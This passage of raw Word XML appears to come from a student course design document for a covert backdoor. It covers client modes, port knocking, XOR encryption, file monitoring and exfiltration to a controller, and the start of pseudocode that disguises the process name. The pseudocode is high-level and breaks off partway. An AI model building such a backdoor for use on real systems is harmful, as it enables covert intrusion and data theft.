      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client Modes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The user shall be able to explicitly specify if the Client will run in “listening” mode or “commanding” mode. “Listening” mode will allow the client to be in a server-like state, listening for the backdoor to alert of document or folder changes. “Commanding” mode will allow the client to send and receive simple commands. Client modes will be specified in command line arguments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Port Knocking Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Client and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Server will </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> implement the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>same</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> port knocking sequence. We have decided to only implement the sequential component of port knocking. The sequence of ports can be determined by the user in the backdoor’s knocking script as well as the firewall script on the controller’s machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Both Client and Server shall have the ability to encrypt and decrypt data. We will be reusing XOR encryption method in Assignment 2 of this course.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server Monitoring &amp; Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The Client will be able to send the backdoor a series of files to monitor or transfer back to headquarters. These files will be explicitly specified in the configuration file by the user. Once exfiltration is done, any ports used by the Client or backdoor will be closed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server Configuration File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The server configuration file will contain all the necessary user settings to allow the client to communicate covertly. These will be determined throughout development.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client Configuration File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The server configuration file will contain all the necessary user settings to allow the client to communicate covertly. These will be determined throughout development. Some examples are: which files to monitor, which directories to watch, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="h.dzcexbwsr16t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="9" w:name="_Toc405739256"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t>High Level Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="19050" distB="19050" distL="19050" distR="19050">
            <wp:extent cx="4229365" cy="1985963"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43"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
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229365" cy="1985963"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="h.p70afshmqlae" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="11" w:name="_Toc405739257"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Logical Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5841147" cy="2052638"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="image108.png" descr="canvas (1).png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image108.png" descr="canvas (1).png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5841147" cy="2052638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="h.zayjyntu953f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc405739258"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pseudo Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>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60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="144" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="144" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Backdoor (Pseudo) Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="144" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="144" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Some Global Variables */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Puppeteer’s IP = 192.168.0.XX</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Puppeteer’s Port = // some random port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Password = // some random password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = // some predetermined pattern</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = // the file to monitor</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DIRECTORY_to_monitor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = //the directory to monitor for changes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Our Main Function */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> main (...)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> unscrambled</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     create a false process name</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     read(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     // we will always listen for commands</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</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listenID</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pthread_create</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>listener_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“command”))</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 xml:space="preserve">     if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> is not null) // we want to watch a file</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</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fileID</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pthread_create</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>watching_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“file”))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
